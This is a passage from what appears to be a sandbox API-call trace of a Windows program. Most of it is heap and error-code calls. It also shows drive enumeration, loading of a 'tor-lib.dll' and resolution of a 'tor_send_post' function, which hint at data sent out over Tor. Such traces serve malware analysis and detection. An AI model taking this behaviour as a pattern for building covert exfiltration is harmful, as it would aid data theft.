Size=0x4) returned 0x419c68 [0153.808] GetLastError () returned 0xcb [0153.808] SetLastError (dwErrCode=0xcb) [0153.808] GetLastError () returned 0xcb [0153.808] SetLastError (dwErrCode=0xcb) [0153.808] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb8) returned 0x3f8d78 [0153.808] GetLastError () returned 0xcb [0153.808] SetLastError (dwErrCode=0xcb) [0153.808] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a6) returned 0x415280 [0153.808] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x415280 | out: hHeap=0x3c0000) returned 1 [0153.808] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d98 | out: hHeap=0x3c0000) returned 1 [0153.808] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3cf9b0 | out: hHeap=0x3c0000) returned 1 [0153.808] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419c68 | out: hHeap=0x3c0000) returned 1 [0153.808] GetLastError () returned 0xcb [0153.809] SetLastError (dwErrCode=0xcb) [0153.809] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6) returned 0x419c68 [0153.809] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x2) returned 0x419cb8 [0153.809] GetLastError () returned 0xcb [0153.809] SetLastError (dwErrCode=0xcb) [0153.809] GetLastError () returned 0xcb [0153.809] SetLastError (dwErrCode=0xcb) [0153.809] GetLastError () returned 0xcb [0153.809] SetLastError (dwErrCode=0xcb) [0153.809] GetLastError () returned 0xcb [0153.809] SetLastError (dwErrCode=0xcb) [0153.809] GetLastError () returned 0xcb [0153.809] SetLastError (dwErrCode=0xcb) [0153.809] GetLastError () returned 0xcb [0153.809] SetLastError (dwErrCode=0xcb) [0153.809] GetLastError () returned 0xcb [0153.809] SetLastError (dwErrCode=0xcb) [0153.809] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1) returned 0x419db8 [0153.809] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x6) returned 0x419c78 [0153.809] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x5) returned 0x419cf8 [0153.809] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4) returned 0x419dc8 [0153.809] GetLastError () returned 0xcb [0153.810] SetLastError (dwErrCode=0xcb) [0153.810] GetLastError () returned 0xcb [0153.810] SetLastError (dwErrCode=0xcb) [0153.810] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb8) returned 0x3cf9b0 [0153.810] GetLastError () returned 0xcb [0153.810] SetLastError (dwErrCode=0xcb) [0153.810] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a6) returned 0x415280 [0153.810] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x415280 | out: hHeap=0x3c0000) returned 1 [0153.810] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419c68 | out: hHeap=0x3c0000) returned 1 [0153.810] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f8d78 | out: hHeap=0x3c0000) returned 1 [0153.811] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419dc8 | out: hHeap=0x3c0000) returned 1 [0153.811] GetLastError () returned 0xcb [0153.811] SetLastError (dwErrCode=0xcb) [0153.811] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6) returned 0x419d58 [0153.811] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419cb8 | out: hHeap=0x3c0000) returned 1 [0153.811] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419c48 | out: hHeap=0x3c0000) returned 1 [0153.811] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419c68 [0153.811] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc10 [0153.811] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437168 | out: hHeap=0x3c0000) returned 1 [0153.811] GetLastError () returned 0xcb [0153.811] SetLastError (dwErrCode=0xcb) [0153.811] GetLastError () returned 0xcb [0153.811] SetLastError (dwErrCode=0xcb) [0153.811] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437168 [0153.811] GetLastError () returned 0xcb [0153.811] SetLastError (dwErrCode=0xcb) [0153.811] GetLastError () returned 0xcb [0153.812] SetLastError (dwErrCode=0xcb) [0153.812] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437168 | out: hHeap=0x3c0000) returned 1 [0153.812] GetLastError () returned 0xcb [0153.812] SetLastError (dwErrCode=0xcb) [0153.812] GetLastError () returned 0xcb [0153.812] SetLastError (dwErrCode=0xcb) [0153.812] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cad0 [0153.812] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc10 | out: hHeap=0x3c0000) returned 1 [0153.812] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d48 | out: hHeap=0x3c0000) returned 1 [0153.812] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419c88 | out: hHeap=0x3c0000) returned 1 [0153.812] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc88 [0153.812] GetLastError () returned 0xcb [0153.812] SetLastError (dwErrCode=0xcb) [0153.812] GetLastError () returned 0xcb [0153.812] SetLastError (dwErrCode=0xcb) [0153.812] GetLastError () returned 0xcb [0153.812] SetLastError (dwErrCode=0xcb) [0153.812] GetLastError () returned 0xcb [0153.812] SetLastError (dwErrCode=0xcb) [0153.812] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cad0 | out: hHeap=0x3c0000) returned 1 [0153.812] GetDriveTypeA (lpRootPathName="E:\\") returned 0x3 [0153.812] GetDiskFreeSpaceExA (in: lpDirectoryName="E:\\", lpFreeBytesAvailableToCaller=0x0, lpTotalNumberOfBytes=0xdcfc08, lpTotalNumberOfFreeBytes=0xdcfc00 | out: lpFreeBytesAvailableToCaller=0x0, lpTotalNumberOfBytes=0xdcfc08, lpTotalNumberOfFreeBytes=0xdcfc00) returned 1 [0153.813] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419c88 [0153.813] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d28 [0153.813] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437168 [0153.813] GetLastError () returned 0xcb [0153.813] SetLastError (dwErrCode=0xcb) [0153.813] GetLastError () returned 0xcb [0153.813] SetLastError (dwErrCode=0xcb) [0153.813] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ca80 [0153.813] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437168 | out: hHeap=0x3c0000) returned 1 [0153.813] GetLastError () returned 0xcb [0153.813] SetLastError (dwErrCode=0xcb) [0153.813] GetLastError () returned 0xcb [0153.813] SetLastError (dwErrCode=0xcb) [0153.814] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437168 [0153.814] GetLastError () returned 0xcb [0153.814] SetLastError (dwErrCode=0xcb) [0153.814] GetLastError () returned 0xcb [0153.814] SetLastError (dwErrCode=0xcb) [0153.814] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437168 | out: hHeap=0x3c0000) returned 1 [0153.814] GetLastError () returned 0xcb [0153.814] SetLastError (dwErrCode=0xcb) [0153.814] GetLastError () returned 0xcb [0153.814] SetLastError (dwErrCode=0xcb) [0153.814] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cad0 [0153.814] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ca80 | out: hHeap=0x3c0000) returned 1 [0153.814] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d28 | out: hHeap=0x3c0000) returned 1 [0153.814] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419c88 | out: hHeap=0x3c0000) returned 1 [0153.814] GetLastError () returned 0xcb [0153.814] SetLastError (dwErrCode=0xcb) [0153.814] GetLastError () returned 0xcb [0153.814] SetLastError (dwErrCode=0xcb) [0153.814] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x4371f8 [0153.814] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc88 | out: hHeap=0x3c0000) returned 1 [0153.814] GetLastError () returned 0xcb [0153.814] SetLastError (dwErrCode=0xcb) [0153.814] GetLastError () returned 0xcb [0153.815] SetLastError (dwErrCode=0xcb) [0153.815] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cad0 | out: hHeap=0x3c0000) returned 1 [0153.815] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b7c8 [0153.815] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b7c8 | out: hHeap=0x3c0000) returned 1 [0153.815] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b608 [0153.815] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4371f8 | out: hHeap=0x3c0000) returned 1 [0153.815] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d18 | out: hHeap=0x3c0000) returned 1 [0153.815] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419a78 | out: hHeap=0x3c0000) returned 1 [0153.815] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437168 [0153.815] GetLastError () returned 0xcb [0153.815] SetLastError (dwErrCode=0xcb) [0153.815] GetLastError () returned 0xcb [0153.815] SetLastError (dwErrCode=0xcb) [0153.815] GetLastError () returned 0xcb [0153.815] SetLastError (dwErrCode=0xcb) [0153.815] GetLastError () returned 0xcb [0153.815] SetLastError (dwErrCode=0xcb) [0153.815] GetLastError () returned 0xcb [0153.815] SetLastError (dwErrCode=0xcb) [0153.815] GetLastError () returned 0xcb [0153.815] SetLastError (dwErrCode=0xcb) [0153.815] GetLastError () returned 0xcb [0153.815] SetLastError (dwErrCode=0xcb) [0153.815] GetLastError () returned 0xcb [0153.816] SetLastError (dwErrCode=0xcb) [0153.816] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cd00 [0153.816] GetLastError () returned 0xcb [0153.816] SetLastError (dwErrCode=0xcb) [0153.816] GetLastError () returned 0xcb [0153.816] SetLastError (dwErrCode=0xcb) [0153.816] GetLastError () returned 0xcb [0153.816] SetLastError (dwErrCode=0xcb) [0153.816] GetLastError () returned 0xcb [0153.816] SetLastError (dwErrCode=0xcb) [0153.816] GetLastError () returned 0xcb [0153.816] SetLastError (dwErrCode=0xcb) [0153.816] GetLastError () returned 0xcb [0153.816] SetLastError (dwErrCode=0xcb) [0153.816] GetLastError () returned 0xcb [0153.816] SetLastError (dwErrCode=0xcb) [0153.816] GetLastError () returned 0xcb [0153.816] SetLastError (dwErrCode=0xcb) [0153.816] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b560 [0153.816] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cd00 | out: hHeap=0x3c0000) returned 1 [0153.816] GetLastError () returned 0xcb [0153.816] SetLastError (dwErrCode=0xcb) [0153.816] GetLastError () returned 0xcb [0153.816] SetLastError (dwErrCode=0xcb) [0153.816] GetLastError () returned 0xcb [0153.817] SetLastError (dwErrCode=0xcb) [0153.817] GetLastError () returned 0xcb [0153.817] SetLastError (dwErrCode=0xcb) [0153.817] GetLastError () returned 0xcb [0153.817] SetLastError (dwErrCode=0xcb) [0153.817] GetLastError () returned 0xcb [0153.817] SetLastError (dwErrCode=0xcb) [0153.817] GetLastError () returned 0xcb [0153.817] SetLastError (dwErrCode=0xcb) [0153.817] GetLastError () returned 0xcb [0153.817] SetLastError (dwErrCode=0xcb) [0153.817] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x47) returned 0x403c50 [0153.817] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b560 | out: hHeap=0x3c0000) returned 1 [0153.817] GetLastError () returned 0xcb [0153.817] SetLastError (dwErrCode=0xcb) [0153.817] GetLastError () returned 0xcb [0153.817] SetLastError (dwErrCode=0xcb) [0153.817] GetLastError () returned 0xcb [0153.817] SetLastError (dwErrCode=0xcb) [0153.817] GetLastError () returned 0xcb [0153.817] SetLastError (dwErrCode=0xcb) [0153.817] GetLastError () returned 0xcb [0153.817] SetLastError (dwErrCode=0xcb) [0153.818] GetLastError () returned 0xcb [0153.818] SetLastError (dwErrCode=0xcb) [0153.818] GetLastError () returned 0xcb [0153.818] SetLastError (dwErrCode=0xcb) [0153.818] GetLastError () returned 0xcb [0153.818] SetLastError (dwErrCode=0xcb) [0153.818] GetLastError () returned 0xcb [0153.818] SetLastError (dwErrCode=0xcb) [0153.818] GetLastError () returned 0xcb [0153.818] SetLastError (dwErrCode=0xcb) [0153.818] GetLastError () returned 0xcb [0153.818] SetLastError (dwErrCode=0xcb) [0153.818] GetLastError () returned 0xcb [0153.818] SetLastError (dwErrCode=0xcb) [0153.818] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a) returned 0x420418 [0153.818] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x403c50 | out: hHeap=0x3c0000) returned 1 [0153.818] GetLastError () returned 0xcb [0153.818] SetLastError (dwErrCode=0xcb) [0153.818] GetLastError () returned 0xcb [0153.818] SetLastError (dwErrCode=0xcb) [0153.818] GetLastError () returned 0xcb [0153.818] SetLastError (dwErrCode=0xcb) [0153.819] GetLastError () returned 0xcb [0153.819] SetLastError (dwErrCode=0xcb) [0153.819] GetLastError () returned 0xcb [0153.819] SetLastError (dwErrCode=0xcb) [0153.819] GetLastError () returned 0xcb [0153.819] SetLastError (dwErrCode=0xcb) [0153.819] GetLastError () returned 0xcb [0153.819] SetLastError (dwErrCode=0xcb) [0153.819] GetLastError () returned 0xcb [0153.819] SetLastError (dwErrCode=0xcb) [0153.819] GetLastError () returned 0xcb [0153.819] SetLastError (dwErrCode=0xcb) [0153.819] GetLastError () returned 0xcb [0153.819] SetLastError (dwErrCode=0xcb) [0153.819] GetLastError () returned 0xcb [0153.819] SetLastError (dwErrCode=0xcb) [0153.819] GetLastError () returned 0xcb [0153.819] SetLastError (dwErrCode=0xcb) [0153.819] GetLastError () returned 0xcb [0153.819] SetLastError (dwErrCode=0xcb) [0153.819] GetLastError () returned 0xcb [0153.819] SetLastError (dwErrCode=0xcb) [0153.819] GetLastError () returned 0xcb [0153.819] SetLastError (dwErrCode=0xcb) [0153.820] GetLastError () returned 0xcb [0153.820] SetLastError (dwErrCode=0xcb) [0153.820] GetLastError () returned 0xcb [0153.820] SetLastError (dwErrCode=0xcb) [0153.820] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x9e) returned 0x41c388 [0153.820] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x420418 | out: hHeap=0x3c0000) returned 1 [0153.820] GetLastError () returned 0xcb [0153.820] SetLastError (dwErrCode=0xcb) [0153.820] GetLastError () returned 0xcb [0153.820] SetLastError (dwErrCode=0xcb) [0153.820] GetLastError () returned 0xcb [0153.820] SetLastError (dwErrCode=0xcb) [0153.820] GetLastError () returned 0xcb [0153.820] SetLastError (dwErrCode=0xcb) [0153.820] GetLastError () returned 0xcb [0153.820] SetLastError (dwErrCode=0xcb) [0153.820] GetLastError () returned 0xcb [0153.820] SetLastError (dwErrCode=0xcb) [0153.820] GetLastError () returned 0xcb [0153.820] SetLastError (dwErrCode=0xcb) [0153.820] GetLastError () returned 0xcb [0153.820] SetLastError (dwErrCode=0xcb) [0153.821] GetLastError () returned 0xcb [0153.821] SetLastError (dwErrCode=0xcb) [0153.821] GetLastError () returned 0xcb [0153.821] SetLastError (dwErrCode=0xcb) [0153.821] GetLastError () returned 0xcb [0153.821] SetLastError (dwErrCode=0xcb) [0153.821] GetLastError () returned 0xcb [0153.821] SetLastError (dwErrCode=0xcb) [0153.821] GetLastError () returned 0xcb [0153.821] SetLastError (dwErrCode=0xcb) [0153.821] GetLastError () returned 0xcb [0153.821] SetLastError (dwErrCode=0xcb) [0153.821] GetLastError () returned 0xcb [0153.821] SetLastError (dwErrCode=0xcb) [0153.821] GetLastError () returned 0xcb [0153.821] SetLastError (dwErrCode=0xcb) [0153.821] GetLastError () returned 0xcb [0153.821] SetLastError (dwErrCode=0xcb) [0153.821] GetLastError () returned 0xcb [0153.821] SetLastError (dwErrCode=0xcb) [0153.821] GetLastError () returned 0xcb [0153.821] SetLastError (dwErrCode=0xcb) [0153.821] GetLastError () returned 0xcb [0153.822] SetLastError (dwErrCode=0xcb) [0153.822] GetLastError () returned 0xcb [0153.822] SetLastError (dwErrCode=0xcb) [0153.822] GetLastError () returned 0xcb [0153.822] SetLastError (dwErrCode=0xcb) [0153.822] GetLastError () returned 0xcb [0153.822] SetLastError (dwErrCode=0xcb) [0153.822] GetLastError () returned 0xcb [0153.822] SetLastError (dwErrCode=0xcb) [0153.822] GetLastError () returned 0xcb [0153.822] SetLastError (dwErrCode=0xcb) [0153.822] GetLastError () returned 0xcb [0153.822] SetLastError (dwErrCode=0xcb) [0153.822] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xec) returned 0x42d680 [0153.822] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41c388 | out: hHeap=0x3c0000) returned 1 [0153.822] GetLastError () returned 0xcb [0153.822] SetLastError (dwErrCode=0xcb) [0153.822] GetLastError () returned 0xcb [0153.822] SetLastError (dwErrCode=0xcb) [0153.822] GetLastError () returned 0xcb [0153.822] SetLastError (dwErrCode=0xcb) [0153.822] GetLastError () returned 0xcb [0153.823] SetLastError (dwErrCode=0xcb) [0153.823] GetLastError () returned 0xcb [0153.823] SetLastError (dwErrCode=0xcb) [0153.823] GetLastError () returned 0xcb [0153.823] SetLastError (dwErrCode=0xcb) [0153.823] GetLastError () returned 0xcb [0153.823] SetLastError (dwErrCode=0xcb) [0153.823] GetLastError () returned 0xcb [0153.823] SetLastError (dwErrCode=0xcb) [0153.823] GetLastError () returned 0xcb [0153.823] SetLastError (dwErrCode=0xcb) [0153.823] GetLastError () returned 0xcb [0153.823] SetLastError (dwErrCode=0xcb) [0153.823] GetLastError () returned 0xcb [0153.823] SetLastError (dwErrCode=0xcb) [0153.823] GetLastError () returned 0xcb [0153.823] SetLastError (dwErrCode=0xcb) [0153.823] GetLastError () returned 0xcb [0153.823] SetLastError (dwErrCode=0xcb) [0153.823] GetLastError () returned 0xcb [0153.823] SetLastError (dwErrCode=0xcb) [0153.823] GetLastError () returned 0xcb [0153.823] SetLastError (dwErrCode=0xcb) [0153.824] GetLastError () returned 0xcb [0153.824] SetLastError (dwErrCode=0xcb) [0153.824] GetLastError () returned 0xcb [0153.824] SetLastError (dwErrCode=0xcb) [0153.824] GetLastError () returned 0xcb [0153.824] SetLastError (dwErrCode=0xcb) [0153.824] GetLastError () returned 0xcb [0153.824] SetLastError (dwErrCode=0xcb) [0153.824] GetLastError () returned 0xcb [0153.824] SetLastError (dwErrCode=0xcb) [0153.824] GetLastError () returned 0xcb [0153.824] SetLastError (dwErrCode=0xcb) [0153.824] GetLastError () returned 0xcb [0153.824] SetLastError (dwErrCode=0xcb) [0153.824] GetLastError () returned 0xcb [0153.824] SetLastError (dwErrCode=0xcb) [0153.824] GetLastError () returned 0xcb [0153.824] SetLastError (dwErrCode=0xcb) [0153.824] GetLastError () returned 0xcb [0153.824] SetLastError (dwErrCode=0xcb) [0153.824] GetLastError () returned 0xcb [0153.824] SetLastError (dwErrCode=0xcb) [0153.824] GetLastError () returned 0xcb [0153.825] SetLastError (dwErrCode=0xcb) [0153.825] GetLastError () returned 0xcb [0153.825] SetLastError (dwErrCode=0xcb) [0153.825] GetLastError () returned 0xcb [0153.825] SetLastError (dwErrCode=0xcb) [0153.825] GetLastError () returned 0xcb [0153.825] SetLastError (dwErrCode=0xcb) [0153.825] GetLastError () returned 0xcb [0153.825] SetLastError (dwErrCode=0xcb) [0153.825] GetLastError () returned 0xcb [0153.825] SetLastError (dwErrCode=0xcb) [0153.825] GetLastError () returned 0xcb [0153.825] SetLastError (dwErrCode=0xcb) [0153.825] GetLastError () returned 0xcb [0153.825] SetLastError (dwErrCode=0xcb) [0153.825] GetLastError () returned 0xcb [0153.825] SetLastError (dwErrCode=0xcb) [0153.825] GetLastError () returned 0xcb [0153.825] SetLastError (dwErrCode=0xcb) [0153.825] GetLastError () returned 0xcb [0153.825] SetLastError (dwErrCode=0xcb) [0153.825] GetLastError () returned 0xcb [0153.826] SetLastError (dwErrCode=0xcb) [0153.826] GetLastError () returned 0xcb [0153.826] SetLastError (dwErrCode=0xcb) [0153.826] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x161) returned 0x4383c8 [0154.024] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42d680 | out: hHeap=0x3c0000) returned 1 [0154.024] GetLastError () returned 0xcb [0154.024] SetLastError (dwErrCode=0xcb) [0154.024] GetLastError () returned 0xcb [0154.024] SetLastError (dwErrCode=0xcb) [0154.024] GetLastError () returned 0xcb [0154.024] SetLastError (dwErrCode=0xcb) [0154.025] GetLastError () returned 0xcb [0154.025] SetLastError (dwErrCode=0xcb) [0154.025] GetLastError () returned 0xcb [0154.025] SetLastError (dwErrCode=0xcb) [0154.025] GetLastError () returned 0xcb [0154.025] SetLastError (dwErrCode=0xcb) [0154.025] GetLastError () returned 0xcb [0154.025] SetLastError (dwErrCode=0xcb) [0154.025] GetLastError () returned 0xcb [0154.025] SetLastError (dwErrCode=0xcb) [0154.025] GetLastError () returned 0xcb [0154.025] SetLastError (dwErrCode=0xcb) [0154.025] GetLastError () returned 0xcb [0154.025] SetLastError (dwErrCode=0xcb) [0154.025] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x4371f8 [0154.025] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437240 [0154.025] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ca0 [0154.025] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437288 [0154.025] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x4372d0 [0154.025] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436700 [0154.025] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x110) returned 0x42c8a8 [0154.025] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436a60 [0154.025] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b218 [0154.026] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b678 [0154.026] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc88 [0154.026] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ccb0 [0154.026] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc88 | out: hHeap=0x3c0000) returned 1 [0154.026] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x110) returned 0x3fa4c0 [0154.026] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x120) returned 0x3ec3b8 [0154.026] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ccb0 | out: hHeap=0x3c0000) returned 1 [0154.026] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3fa4c0 | out: hHeap=0x3c0000) returned 1 [0154.026] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1af) returned 0x420c20 [0154.026] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec3b8 | out: hHeap=0x3c0000) returned 1 [0154.026] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b7c8 [0154.026] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x47) returned 0x4039d0 [0154.026] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b7c8 | out: hHeap=0x3c0000) returned 1 [0154.026] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4039d0 | out: hHeap=0x3c0000) returned 1 [0154.026] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x160) returned 0x3ec3b8 [0154.026] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b560 [0154.026] AreFileApisANSI () returned 1 [0154.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d2cc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0154.026] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x48) returned 0x403750 [0154.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d2cc0, cbMultiByte=-1, lpWideCharStr=0x403750, cchWideChar=36 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\tor-lib.dll") returned 36 [0154.026] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tor-lib.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\tor-lib.dll"), fInfoLevelId=0x0, lpFileInformation=0xdcfadc | out: lpFileInformation=0xdcfadc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f63dc30, ftCreationTime.dwHighDateTime=0x1d6ad29, ftLastAccessTime.dwLowDateTime=0x2f63dc30, ftLastAccessTime.dwHighDateTime=0x1d6ad29, ftLastWriteTime.dwLowDateTime=0x2f663f72, ftLastWriteTime.dwHighDateTime=0x1d6ad29, nFileSizeHigh=0x0, nFileSizeLow=0x9800)) returned 1 [0154.027] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x403750 | out: hHeap=0x3c0000) returned 1 [0154.027] GetProcAddress (hModule=0x74190000, lpProcName="tor_send_post") returned 0x74191e72 [0154.027] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x160) returned 0x437db8 [0154.027] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x407038 | out: hHeap=0x3c0000) returned 1 [0154.028] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x438a98 [0154.028] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x3353c1, phModule=0x438aa4 | out: phModule=0x438aa4*=0x320000) returned 1 [0154.028] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a19, lpParameter=0x438a98, dwCreationFlags=0x4, lpThreadId=0xdcfb20 | out: lpThreadId=0xdcfb20*=0x1088) returned 0x550 [0154.032] ResumeThread (hThread=0x550) returned 0x1 [0154.032] WaitForSingleObject (hHandle=0x550, dwMilliseconds=0xea60) returned 0x0 [0197.422] TerminateThread (hThread=0x550, dwExitCode=0x0) returned 0 [0197.423] CloseHandle (hObject=0x550) returned 0 [0197.423] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43caf8 [0197.423] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b560 | out: hHeap=0x3c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec3b8 | out: hHeap=0x3c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x420c20 | out: hHeap=0x3c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b678 | out: hHeap=0x3c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b218 | out: hHeap=0x3c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436a60 | out: hHeap=0x3c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4372d0 | out: hHeap=0x3c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42c8a8 | out: hHeap=0x3c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436700 | out: hHeap=0x3c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437288 | out: hHeap=0x3c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, 